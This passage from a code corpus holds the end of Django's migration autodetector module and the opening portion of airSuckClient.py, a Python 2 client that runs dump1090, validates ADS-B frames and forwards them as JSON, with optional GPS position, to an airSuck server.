model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "rel") and getattr(new_field.rel, "to", None):
rename_key = (
new_field.rel.to._meta.app_label,
new_field.rel.to._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.rel.to = old_field.rel.to
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
def _generate_altered_foo_together(self, operation):
option_name = operation.option_name
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
# We run the old version through the field renames to account for those
old_value = old_model_state.options.get(option_name) or set()
if old_value:
old_value = {
tuple(
self.renamed_fields.get((app_label, model_name, n), n)
for n in unique
)
for unique in old_value
}
new_value = new_model_state.options.get(option_name) or set()
if new_value:
new_value = set(new_value)
if old_value != new_value:
self.add_operation(
app_label,
operation(
name=model_name,
**{option_name: new_value}
)
)
def generate_altered_unique_together(self):
self._generate_altered_foo_together(operations.AlterUniqueTogether)
def generate_altered_index_together(self):
self._generate_altered_foo_together(operations.AlterIndexTogether)
def generate_altered_db_table(self):
models_to_check = self.kept_model_keys.union(self.kept_proxy_keys).union(self.kept_unmanaged_keys)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_db_table_name = old_model_state.options.get('db_table')
new_db_table_name = new_model_state.options.get('db_table')
if old_db_table_name != new_db_table_name:
self.add_operation(
app_label,
operations.AlterModelTable(
name=model_name,
table=new_db_table_name,
)
)
def generate_altered_options(self):
"""
Works out if any non-schema-affecting options have changed and
makes an operation to represent them in state changes (in case Python
code in migrations needs them)
"""
models_to_check = self.kept_model_keys.union(
self.kept_proxy_keys
).union(
self.kept_unmanaged_keys
).union(
# unmanaged converted to managed
set(self.old_unmanaged_keys).intersection(self.new_model_keys)
).union(
# managed converted to unmanaged
set(self.old_model_keys).intersection(self.new_unmanaged_keys)
)
for app_label, model_name in sorted(models_to_check):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
old_options = dict(
option for option in old_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
new_options = dict(
option for option in new_model_state.options.items()
if option[0] in AlterModelOptions.ALTER_OPTION_KEYS
)
if old_options != new_options:
self.add_operation(
app_label,
operations.AlterModelOptions(
name=model_name,
options=new_options,
)
)
def generate_altered_order_with_respect_to(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if (old_model_state.options.get("order_with_respect_to", None) !=
new_model_state.options.get("order_with_respect_to", None)):
# Make sure it comes second if we're adding
# (removal dependency is part of RemoveField)
dependencies = []
if new_model_state.options.get("order_with_respect_to", None):
dependencies.append((
app_label,
model_name,
new_model_state.options["order_with_respect_to"],
True,
))
# Actually generate the operation
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=new_model_state.options.get('order_with_respect_to', None),
),
dependencies=dependencies,
)
def generate_altered_managers(self):
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
if old_model_state.managers != new_model_state.managers:
self.add_operation(
app_label,
operations.AlterModelManagers(
name=model_name,
managers=new_model_state.managers,
)
)
def arrange_for_graph(self, changes, graph, migration_name=None):
"""
Takes in a result from changes() and a MigrationGraph,
and fixes the names and dependencies of the changes so they
extend the graph from the leaf nodes for each app.
"""
leaves = graph.leaf_nodes()
name_map = {}
for app_label, migrations in list(changes.items()):
if not migrations:
continue
# Find the app label's current leaf node
app_leaf = None
for leaf in leaves:
if leaf[0] == app_label:
app_leaf = leaf
break
# Do they want an initial migration for this app?
if app_leaf is None and not self.questioner.ask_initial(app_label):
# They don't.
for migration in migrations:
name_map[(app_label, migration.name)] = (app_label, "__first__")
del changes[app_label]
continue
# Work out the next number in the sequence
if app_leaf is None:
next_number = 1
else:
next_number = (self.parse_number(app_leaf[1]) or 0) + 1
# Name each migration
for i, migration in enumerate(migrations):
if i == 0 and app_leaf:
migration.dependencies.append(app_leaf)
if i == 0 and not app_leaf:
new_name = "0001_%s" % migration_name if migration_name else "0001_initial"
else:
new_name = "%04i_%s" % (
next_number,
migration_name or self.suggest_name(migration.operations)[:100],
)
name_map[(app_label, migration.name)] = (app_label, new_name)
next_number += 1
migration.name = new_name
# Now fix dependencies
for app_label, migrations in changes.items():
for migration in migrations:
migration.dependencies = [name_map.get(d, d) for d in migration.dependencies]
return changes
def _trim_to_apps(self, changes, app_labels):
"""
Takes changes from arrange_for_graph and set of app labels and
returns a modified set of changes which trims out as many migrations
that are not in app_labels as possible.
Note that some other migrations may still be present, as they may be
required dependencies.
"""
# Gather other app dependencies in a first pass
app_dependencies = {}
for app_label, migrations in changes.items():
for migration in migrations:
for dep_app_label, name in migration.dependencies:
app_dependencies.setdefault(app_label, set()).add(dep_app_label)
required_apps = set(app_labels)
# Keep resolving till there's no change
old_required_apps = None
while old_required_apps != required_apps:
old_required_apps = set(required_apps)
for app_label in list(required_apps):
required_apps.update(app_dependencies.get(app_label, set()))
# Remove all migrations that aren't needed
for app_label in list(changes.keys()):
if app_label not in required_apps:
del changes[app_label]
return changes
@classmethod
def suggest_name(cls, ops):
"""
Given a set of operations, suggests a name for the migration
they might represent. Names are not guaranteed to be unique,
but we put some effort in to the fallback name to avoid VCS conflicts
if we can.
"""
if len(ops) == 1:
if isinstance(ops[0], operations.CreateModel):
return ops[0].name_lower
elif isinstance(ops[0], operations.DeleteModel):
return "delete_%s" % ops[0].name_lower
elif isinstance(ops[0], operations.AddField):
return "%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif isinstance(ops[0], operations.RemoveField):
return "remove_%s_%s" % (ops[0].model_name_lower, ops[0].name_lower)
elif len(ops) > 1:
if all(isinstance(o, operations.CreateModel) for o in ops):
return "_".join(sorted(o.name_lower for o in ops))
return "auto_%s" % datetime.datetime.now().strftime("%Y%m%d_%H%M")
@classmethod
def parse_number(cls, name):
"""
Given a migration name, tries to extract a number from the
beginning of it. If no number found, returns None.
"""
if re.match(r"^\d+_", name):
return int(name.split("_")[0])
return None
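# Illustrative behaviour of the two helpers above (values are examples only):
#
#     suggest_name([operations.CreateModel(name='Author', fields=[])])
#     # -> 'author'
#     suggest_name([<an AddField>, <a RemoveField>])
#     # -> falls back to an 'auto_20150101_1200'-style name based on the current time
#
#     parse_number('0002_remove_author_age')  # -> 2
#     parse_number('initial')                 # -> None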
| license: bsd-3-clause | hash: -44,870,453,815,950,104 | line_mean: 47.424889 | line_max: 166 | alpha_frac: 0.546753 | autogenerated: false |
ThreeSixes/airSuck | airSuckClient.py | copies: 1 | size: 41255 |
#!/usr/bin/python
"""
airSuckClient by ThreeSixes (https://github.com/ThreeSixes)
This project is licensed under GPLv3. See COPYING for details.
This file is part of the airSuck project (https://github.com/ThreeSixes/airSUck).
"""
###########
# Imports #
###########
try:
import config
except:
raise IOError("No configuration present. Please copy config/config.py to the airSuck folder and edit it.")
# Load the config _very_ early.
asConfig = config.airSuckClientSettings
# If we have an attached GPS...
if asConfig['gps']:
# Do GPS things.
from gps import *
import datetime
import json
import re
import socket
import time
import threading
import traceback
import Queue
import atexit
import signal
import sys
import errno
from libAirSuck import asLog
from subprocess import Popen, PIPE, STDOUT
from pprint import pprint
#########################
# dump1090Handler class #
#########################
class airSuckClient():
# Class consructor
def __init__(self):
"""
airSuckClient manages the dump1090 executable used to grab ADS-B data and makes sure it's running. If the process jams it is restarted.
"""
# Init message.
logger.log("Init airSuckClient...")
# Build the command we need to run dump1090 in a fashion Popen can understand.
self.popenCmd = [asConfig['dump1090Path']] + asConfig['dump1090Args'].split(" ")
# Pre-compiled regex used to verify dump1090 ADS-B data.
self.__re1090 = re.compile("[@*]([a-fA-F0-9])+;")
#self.__re1090Mlat = re.compile("[@*]([a-fA-F0-9])+;")
# Watchdog setup.
self.__myWatchdog = None
self.__lastADSB = 0
self.__watchdog1090Restart = False
self.__lastSrvKeepalive = 0
self.__keepAliveTimer = 0
self.__maxTimeSrv = 2.0 * asConfig['keepaliveInterval']
self.__keepaliveJSON = "{\"keepalive\": \"abcdef\"}"
# Backoff counters
self.__backoff1090 = 1.0
self.__backoffSrv = 1.0
# Networking.
self.__serverSock = None
self.__serverConnected = False
self.__rxBuffSz = 128
# Should we keep going?
self.__keepRunning = True
# Queue worker running?
self.__queueWorkerRunning = False
# RX watcher running?
self.__rxWatcherRunning = False
# Dump1090 running?
self.__dump1090Running = False
# Global dump1090 process holder.
self.__proc1090 = None
# GPSD stuff...
# Do we have an initial position?
self.__gpsdData = False
# Is there anything prohibiting the start of the GPS worker?
self.__startGpsWorker = asConfig['gps']
def __clientWatchdog(self):
"""
Master watchdog for the software client.
"""
# If we're connected to the server do the network checks.
if self.__serverConnected:
try:
# Check to see if we got data from dump1090.
if self.__lastSrvKeepalive >= self.__maxTimeSrv:
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastSrvKeepalive += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No keepalive for %s sec." %self.__maxTimeSrv)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
try:
# If we're connected.
if self.__serverConnected:
# If it's time to send the keepalive...
if self.__keepAliveTimer >= asConfig['keepaliveInterval']:
self.__keepAliveTimer = 0
if self.__keepAliveTimer == 0:
# Send the ping.
self.__send(self.__keepaliveJSON)
# Roll the keepalive timer.
self.__keepAliveTimer += 1
else:
# Reset the keeplaive timer.
self.__keepAliveTimer = 0
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Flag our connection as dead.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
# Set flag indicating whether we restarted because of the watchdog.
self.__watchdog1090Restart = False
# If we're running dump1090 handle timing it out.
if asConfig['dump1090Enabled']:
try:
# Check to see if we got data from dump1090.
if self.__lastADSB >= asConfig['dump1090Timeout']:
# Set watchdog restart flag.
self.__watchdog1090Restart = True
try:
# Kill dump1090
self.__proc1090.kill()
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
# Do nothing in the event it fails.
pass
# Raise an exception.
raise IOError()
else:
# Increment our last entry.
self.__lastADSB += 1
except IOError:
# Print the error message
logger.log("airSuck client watchdog: No data from dump1090 in %s sec." %asConfig['dump1090Timeout'])
try:
# Stop dump1090.
self.__proc1090.kill()
except:
# Do nothing, since it won't die nicely in some cases.
pass
finally:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
except KeyboardInterrupt:
# Pass the keyboard interrupt exception up the stack.
raise KeyboardInterrupt
except SystemExit:
# pass the system exit exception up the stack.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client watchdog threw exception:\n%s" %tb)
# Restart our watchdog.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
def __rxWatcher(self):
"""
Handle data recieved from our connected socket.
"""
# Flag the RX watcher as running
self.__rxWatcherRunning = True
# Loop guard
keepRunning = True
# Empty buffer string.
buff = ""
# While we're connected
while keepRunning:
try:
if self.__serverConnected == True:
# Get data.
buff = buff + self.__serverSock.recv(self.__rxBuffSz)
# If we have a newline check of our string and clear the buffer.
if buff.find("\n"):
# If we got our JSON sentence reset the counter.
if buff == self.__keepaliveJSON + "\n":
self.__lastSrvKeepalive = 0
# If we're debugging log the things.
if asConfig['debug']:
logger.log("RX Keepalive: %s" %buff.strip())
# Reset data stuff.
buff = ""
# Attempt to send another keepalive.
self.__send(self.__keepaliveJSON)
except KeyboardInterrupt:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# Pass the exception up the chain.
raise KeyboardInterrupt
except SystemExit:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# pass the system exit exception up the stack.
raise SystemExit
except socket.timeout:
# If we time out do nothing. This is intentional.
pass
except Exception as e:
# We don't want to keep running.
keepRunning = False
# Flag the RX watcher as not running
self.__rxWatcherRunning = False
# We probably disconnected.
self.__serverConnected = False
if hasattr(e, 'errno'):
# If something goes wrong...
if e.errno == 32:
# We expect this to break this way sometimes.
raise IOError
else:
tb = traceback.format_exc()
logger.log("Exception in airSuck client rxWatcher:\n%s" %tb)
def __gpsWorker(self):
"""
This monitors GPSD for new data and updates our class-wide GPS vars.
"""
logger.log("Starting GPS worker...")
# We shouldn't start another GPS worker unless we have an exception.
self.__startGpsWorker = False
# If loading GPS worked...
canHasGps = False
try:
# If we have a gps set it up.
if asConfig['gps']:
self.__gps = gps(mode=WATCH_ENABLE)
# We're up!
canHasGps = True
try:
# Keep doing the things.
while(canHasGps):
# Get the "next" data...
self.__gps.next()
# Set our flag to let the system know we have an initial reading.
self.__gpsdData = True
# If we have an keyboard interrupt or system exit pass it on.
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except:
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
except:
# Flag the gpsWorker thread as down.
self.__gpsWorkerRunning = False
self.__gpsWorkerFail = True
# Whatever else happens we want to log.
tb = traceback.format_exc()
logger.log("GPS worker blew up trying to activte the GPS:\n%s" %tb)
# Dump message and wait 30 sec before clearing the fail flag.
logger.log("GPS worker sleeping 30 sec.")
time.sleep(30.0)
# Now we want to try and start again.
self.__startGpsWorker = True
def __handleBackoffSrv(self, reset=False):
"""
Handle the backoff algorithm for reconnect delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoffSrv = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoffSrv == 1.0:
self.__backoffSrv = 2.0
elif self.__backoffSrv == 2.0:
self.__backoffSrv = 4.0
return
def __handleBackoff1090(self, reset=False):
"""
Handle the backoff algorithm for restart delay. Accepts one optional argument, reset which is a boolean value. When reset is true, the backoff value is set back to 1. Returns no data.
"""
# If we're resetting the backoff set it to 1.0.
if reset:
self.__backoff1090 = 1.0
else:
# backoff ^ 2 for each iteration, ending at 4.0.
if self.__backoff1090 == 1.0:
self.__backoff1090 = 2.0
elif self.__backoff1090 == 2.0:
self.__backoff1090 = 4.0
return
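# Both backoff helpers implement the same capped doubling; illustrative progression:
#
#     attempt:        1st   2nd   3rd   4th...
#     backoff value:  1.0   2.0   4.0   4.0 (stays capped at 4.0)
#
# Calling __handleBackoffSrv(reset=True) or __handleBackoff1090(reset=True) drops the
# value back to 1.0, typically once a connection or restart succeeds.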
def __createBaseJSON(self):
"""
Creates a base JSON dictionary with information generic to all output.
"""
# Get the timestamp data.
dtsStr = str(datetime.datetime.utcnow())
# Create basic JSON dictionary.
retVal = {"clientName": asConfig['myName'], "dataOrigin": "airSuckClient", "dts": dtsStr}
# If we have gps support enabled...
if asConfig['gps']:
try:
# And if we have an initial reading plus a fix...
if self.__gpsdData and (self.__gps.fix.mode > 1):
# Update dictionary with GPS-related data.
retVal.update({"srcLat": self.__gps.fix.latitude, "srcLon": self.__gps.fix.longitude, "srcPosMeta": "gps"})
elif asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
except:
tb = traceback.format_exc()
logger.log("Failed to get GPS position data:%s" %tb)
else:
# Handle GPS and related config data here.
if asConfig['reportPos']:
try:
# Update dictionary with GPS-related data.
retVal.update({"srcLat": float(asConfig['myPos'][0]), "srcLon": float(asConfig['myPos'][1]), "srcPosMeta": "manual"})
except:
logger.log("Improperly formatted position data from config.py.")
return retVal
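	# Illustrative sketch (not part of the original code): the dictionary
	# returned above typically looks like the following, with the position keys
	# present only when a GPS fix or a configured manual position is available
	# (values below are made up):
	#   {"clientName": "myClient", "dataOrigin": "airSuckClient",
	#    "dts": "2015-01-01 12:00:00.000000",
	#    "srcLat": 37.77, "srcLon": -122.42, "srcPosMeta": "gps"}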
def __verifyADSB(self, line):
"""
		Verifies the formatting of a potential ADS-B frame. Returns True if the incoming data matches the ADS-B regex, and False otherwise.
"""
# Assume we don't have good data by default.
retVal = False
# If we get a match...
if self.__re1090.match(line) is not None:
retVal = True
# If we're debugging log the things.
if asConfig['debug']:
logger.log("%s appears to be valid ADS-B." %line.strip())
# And return...
return retVal
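	# Illustrative note (not part of the original code): the accepted format is
	# whatever self.__re1090 (defined earlier in this class) matches. dump1090's
	# raw output is typically an asterisk-prefixed hex string terminated by a
	# semicolon, e.g. "*8d4840d6202cc371c32ce0576098;", but treat that as an
	# assumption here rather than a guarantee.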
def __handleADSB(self, adsb):
"""
		JSON-wraps a validated ADS-B frame and places it on the queue to be sent over the network.
"""
# Reset watchdog value.
self.__lastADSB = 0
# Build a dictionary with minimal information to send.
adsbDict = {"type": "airSSR", "data": adsb.strip()}
adsbDict.update(self.__createBaseJSON())
try:
# JSONify the dictionary.
adsbJSON = json.dumps(adsbDict)
except:
			tb = traceback.format_exc()
			logger.log("Exception occurred creating JSON from dictionary:\n%s" %tb)
			# Without a valid JSON string there's nothing to enqueue.
			return
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Enqueue: %s" %adsbJSON)
try:
# Put it on the queue.
clientQ.put(adsbJSON)
except:
tb = traceback.format_exc()
logger.log("dump1090 exception putting data on queue:\n%s" %tb)
return
def __stdoutWorker(self):
"""
Handle STDOUT output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Grab the current line from STDOUT.
output = self.__proc1090.stdout.readline()
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
# If we're debugging...
if asConfig['debug']:
logger.log("Passing %s to __handleADSB." %output.strip())
self.__handleADSB(output)
# Get any 'straggling' output.
output = self.__proc1090.communicate()[0]
# If we're debugging dump the raw data
if asConfig['debug']:
logger.log("dump1090 stdout: %s" %output.strip())
# If it seems to be valid ADS-B then use it.
if self.__verifyADSB(output):
self.__handleADSB(output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
			pass
def __stderrWorker(self):
"""
Handle STDERR output from dump1090.
"""
try:
# While we're still running...
while self.__proc1090.poll() is None:
# Get our STDERR output minus the newline char.
output = self.__proc1090.stderr.readline().replace("\n", "")
# If we're debugging...
if asConfig['debug']:
# If there's something on the line print it.
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
# See if there's any data that wasn't picked up by our loop and print it, too.
output = self.__proc1090.communicate()[1].replace("\n", "")
# If we're debugging...
if asConfig['debug']:
if output.strip() != "":
logger.log("dump1090 stderr: %s" %output)
except KeyboardInterrupt:
raise KeyboardInterrupt
except SystemExit:
raise SystemExit
except AttributeError:
# Just die nicely.
pass
except IOError:
# Just die nicely.
			pass
def __connectServer(self):
"""
Connects to our host.
"""
# Create a new socket object.
self.__serverSock = socket.socket()
# Print message
logger.log("airSuck client connecting to %s:%s..." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Attempt to connect.
try:
# Connect up
self.__serverSock.connect((asConfig['connSrvHost'], asConfig['connSrvPort']))
logger.log("airSuck client connected.")
# We're connected now.
self.__serverConnected = True
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
# Reset the watchdog state.
self.__watchdogFail = False
# Reset the backoff value
self.__handleBackoffSrv(True)
# Set 1 second timeout for blocking operations.
self.__serverSock.settimeout(1.0)
# The TX and RX watchdogs should be run every second.
self.__lastSrvKeepalive = 0
except KeyboardInterrupt:
# Pass it up the stack.
raise KeyboardInterrupt
except SystemExit:
# Pass it up the stack.
raise SystemExit
		except socket.error as v:
# Connection refused.
if v[0] == errno.ECONNREFUSED:
logger.log("%s:%s refused connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
			# Connection reset.
elif v[0] == errno.ECONNRESET:
logger.log("%s:%s reset connection." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Connection timeout.
elif v[0] == errno.ETIMEDOUT:
logger.log("Connection to %s:%s timed out." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# DNS or address error.
elif v[0] == -2:
logger.log("%s:%s DNS resolution failure or invalid address." %(asConfig['connSrvHost'], asConfig['connSrvPort']))
# Something else happened.
else:
logger.log("%s:%s unhandled socket error: %s (%s)" %(asConfig['connSrvHost'], asConfig['connSrvPort'], v[1], v[0]))
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
except Exception as e:
			# Something unexpected happened.
tb = traceback.format_exc()
logger.log("airSuck client went boom connecting:\n%s" %tb)
# Set backoff delay.
boDelay = asConfig['reconnectDelay'] * self.__backoffSrv
# In the event our connect fails, try again after the configured delay
logger.log("airSuck client sleeping %s sec." %boDelay)
time.sleep(boDelay)
# Handle backoff.
self.__handleBackoffSrv()
def __disconnectSouce(self):
"""
Disconnect from our host.
"""
logger.log("airSuck client disconnecting.")
# Clear the server connected flag.
self.__serverConnected = False
try:
# Close the connection.
self.__serverSock.close()
except:
tb = traceback.format_exc()
logger.log("airSuck client threw exception disconnecting.\n%s" %tb)
# Reset the last keepalive counter.
self.__lastSrvKeepalive = 0
def __send(self, data):
"""
Sends specified data to the airSuck destination server.
"""
# If we think we're connected try to send the infos. If not, do nothing.
if self.__serverConnected:
try:
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Netsend: %s" %data)
# Send the data to the server.
sendRes = self.__serverSock.send("%s\n" %data)
# If we weren't able to send anything...
if sendRes == 0:
# Cause a small explosion.
raise RuntimeError("Socked failed to send data. The connection is down.")
except:
tb = traceback.format_exc()
logger.log("airSuck client send exception:\n%s" %tb)
# Flag our connection as dead in the event we fail to send.
self.__serverConnected = False
# Disconnect.
self.__disconnectSouce()
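	# Illustrative note (not part of the original code): messages are sent as
	# newline-delimited JSON -- __send() appends "\n" to each JSON string, so
	# the receiving server can split the incoming stream on newlines to recover
	# individual messages.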
def __queueWorker(self):
"""
Sends data on the queue to the remote server.
"""
self.__queueWorkerRunning = True
logger.log("airSuck client queue worker starting...")
while True:
try:
# Grab the JSON put on the queue
someJSON = clientQ.get()
# If we're debugging log the things.
if asConfig['debug']:
logger.log("Dequeue: %s" %someJSON)
# And then send it over the network.
self.__send(someJSON)
except:
tb = traceback.format_exc()
logger.log("airSuck client queue worker caught exception reading from queue:\n%s" %tb)
# Flag the queue worker as down.
self.__queueWorkerRunning = False
def __kill1090(self):
"""
Kill the dump1090 process.
"""
logger.log("Attempting to kill dump1090...")
try:
if self.__proc1090.poll() is None:
self.__proc1090.kill()
logger.log("dump1090 killed.")
except AttributeError:
# The process is already dead.
logger.log("dump1090 not running.")
except:
# Unhandled exception.
tb = traceback.format_exc()
logger.log("Exception thrown while killing dump1090:\n%s" %tb)
		# Flag dump1090 as down.
self.__dump1090Running = False
# Blank the object.
self.__proc1090 = None
def __worker(self):
"""
The main worker method that spins up the dump1090 executable and takes data from stdout.
"""
# We want to keep going.
keepRunning = True
# Start our watchdog process.
self.__myWatchdog = threading.Timer(1.0, self.__clientWatchdog)
self.__myWatchdog.start()
# Make sure we kill dump1090 when we shut down.
atexit.register(self.__kill1090)
# Keep running and restarting dump1090 unless the program is killed.
while keepRunning:
# If we have GPS enabled and there's no reason we shouldn't start it.
if asConfig['gps'] and self.__startGpsWorker:
try:
# Start the GPS worker thread.
gpsWorker = threading.Thread(target=self.__gpsWorker)
gpsWorker.daemon = True
gpsWorker.start()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up starting the GPS worker:\n%s" %tb)
try:
				# If we're supposed to keep running and the server isn't connected yet, connect.
if keepRunning and (not self.__serverConnected):
self.__connectServer()
except KeyboardInterrupt:
# Pass it on...
raise KeyboardInterrupt
except SystemExit:
# Pass it up.
raise SystemExit
except:
tb = traceback.format_exc()
logger.log("airSuck client worker blew up:\n%s" %tb)
self.__disconnectSouce()
try:
# If the RX watcher is not running
if (not self.__rxWatcherRunning):
# Start the RX watcher...
rxListener = threading.Thread(target=self.__rxWatcher)
rxListener.daemon = True
rxListener.start()
except KeyboardInterrupt:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
				self.__rxWatcherRunning = False
# Raise the keyboard interrupt.
raise KeyboardInterrupt
except SystemExit:
# Stop looping.
keepRunning = False
# Flag the RX watcher as not running
				self.__rxWatcherRunning = False
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Log the exception
tb = traceback.format_exc()
logger.log("airSuck client rxListener blew up:\n%s" %tb)
# Flag the RX watcher as not running
				self.__rxWatcherRunning = False
try:
# If the queue worker isn't running...
if (not self.__queueWorkerRunning):
# Start our queue worker.
queueThread = threading.Thread(target=self.__queueWorker)
queueThread.daemon = True
queueThread.start()
except KeyboardInterrupt:
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Pass the exception up the chain to our runner.
raise SystemExit
except:
# Something else unknown happened.
tb = traceback.format_exc()
logger.log("dump1090 worker threw exception:\n%s" %tb)
try:
# Make sure Dump1090 is supposed to start, and that we're supposed to keep it running.
if (asConfig['dump1090Enabled']) and (not self.__dump1090Running):
					# We don't have dump1090 started yet.
					if self.__proc1090 is None:
# Start dump1090.
self.__proc1090 = Popen(self.popenCmd, stdout=PIPE, stderr=PIPE)
# If we have dump1090 working
if self.__proc1090 is not None:
logger.log("dump1090 started with PID %s." %self.__proc1090.pid)
						# Flag dump1090 as running.
self.__dump1090Running = True
						# Reset the backoff since we managed to start.
self.__handleBackoff1090(True)
# Start the watchdog after resetting lastADSB.
self.__lastADSB = 0
# Set up some threads to listen to the dump1090 output.
stdErrListener = threading.Thread(target=self.__stderrWorker)
stdOutListener = threading.Thread(target=self.__stdoutWorker)
stdErrListener.daemon = True
stdOutListener.daemon = True
stdErrListener.start()
stdOutListener.start()
# If we intend to restart dump1090 and we didn't kill dump1090 because of the watchdog...
if (not self.__dump1090Running) and (not self.__watchdog1090Restart):
# Handle backoff algorithm before it restarts.
boDly = self.__backoff1090 * asConfig['dump1090Delay']
logger.log("dump1090 sleeping %s sec before restart." %boDly)
time.sleep(boDly)
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Run the backoff handler.
self.__handleBackoff1090()
except KeyboardInterrupt:
# We don't want to keep running since we were killed.
keepRunning = False
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Pass the exception up the chain to our runner.
raise KeyboardInterrupt
except SystemExit:
# Flag dump1090 as down.
self.__dump1090Running = False
self.__proc1090 = None
# Raise the exception again.
raise SystemExit
except OSError:
